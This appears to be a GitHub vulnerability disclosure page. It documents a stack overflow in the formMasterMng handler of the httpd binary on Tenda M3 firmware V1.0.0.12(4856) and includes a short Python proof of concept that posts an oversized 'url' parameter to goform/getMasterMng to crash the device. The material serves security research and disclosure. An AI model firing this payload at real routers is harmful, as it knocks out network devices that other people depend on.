IoT-vuln/Tenda/M3/formMasterMng at main · d1tto/IoT-vuln

History

Name		Name	Last commit message	Last commit date
parent directory ..
img		img
readme.md		readme.md

readme.md

Overview

The device's official website: https://www.tenda.com.cn/product/M3.html
Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

Affected version

V1.0.0.12(4856)

Vulnerability details

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formMasterMng function, which can be accessed via the URL goform/getMasterMng

formMasterMng function gets the POST parameter url and copies to stack buffer without checking its length, causing a stack overflow vulnerability.

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"url": b'A'*0x400,
}
cookies = {
    b"user": "admin"
}
res = requests.post("http://127.0.0.1/goform/getMasterMng", data=data, cookies=cookies)
print(res.content)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

formMasterMng

formMasterMng

readme.md

Overview

Affected version

Vulnerability details

PoC

Files

formMasterMng

Directory actions

More options

Directory actions

More options

Latest commit

History

formMasterMng

Folders and files

parent directory

readme.md

Overview

Affected version

Vulnerability details

PoC